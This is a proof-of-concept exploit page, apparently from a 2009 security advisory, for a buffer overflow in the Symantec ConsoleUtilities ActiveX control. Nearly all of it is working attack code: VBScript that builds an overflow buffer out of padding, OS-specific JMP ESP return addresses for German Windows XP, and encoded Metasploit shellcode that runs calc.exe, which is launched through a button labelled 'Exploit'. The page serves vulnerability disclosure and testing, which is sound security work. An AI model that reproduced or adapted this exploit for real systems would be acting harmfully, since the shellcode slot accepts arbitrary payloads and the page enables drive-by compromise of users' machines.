<html> <title>NSOADV-2009-001</title> <object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'/> </object> <script language='vbscript'> Sub Submit_OnClick For i=0 to 2 If document.ret.os(i).checked Then target=document.ret.os(i).value End If Next EIP=unescape(target) arg1 = "" arg3 = "" arg4 = "" arg5 = "" junk=String(310, "A") 'junk morejunk=String(18, unescape("%u0041")) 'more junk // windows/exec - 224 bytes // http://www.metasploit.com // Encoder: x86/call4_dword_xor // EXITFUNC=seh, CMD=calc.exe code=unescape("%uc92b%ue983%ue8ce%uffff%uffff%u5ec0%u7681%ue60e"&_ "%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d"&_ "%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f"&_ "%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d"&_ "%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c"&_ "%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875"&_ "%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981"&_ "%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58"&_ "%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe"&_ "%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2"&_ "%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d"&_ "%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b"&_ "%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a"&_ "%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848") buf=junk+EIP+morejunk+break+code obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5 End Sub </script> <h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2> Use it only for education or ethical pentesting! The author accepts no liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi) (http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br> <h3>Some RET Infos:</h3> Overwrite EIP with AAAA (crash)<br> EIP=String(2, unescape("%u4141"))<br><br> XP SP2 Ger shell32.dll JMP ESP<br> EIP=unescape("%uaf0a%u77d5")<br><br> XP SP3 Ger shell32.dll JMP ESP<br> EIP=unescape("%u30D7%u7E68")<br><br> ---------------------------------------------------------------- <form name="ret"> <input type=radio name="os" value="%u4141%u4141"> DoS<br> <input type=radio name="os" value="%uaf0a%u77d5"> Windows XP SP2 German<br> <input type=radio name="os" value="%u30D7%u7E68"> Windows XP SP3 German<br> <input type=button name="Submit" VALUE="Exploit"> </form> <img src="http://sotiriu.de/images/logo_wh_80.png"> </html>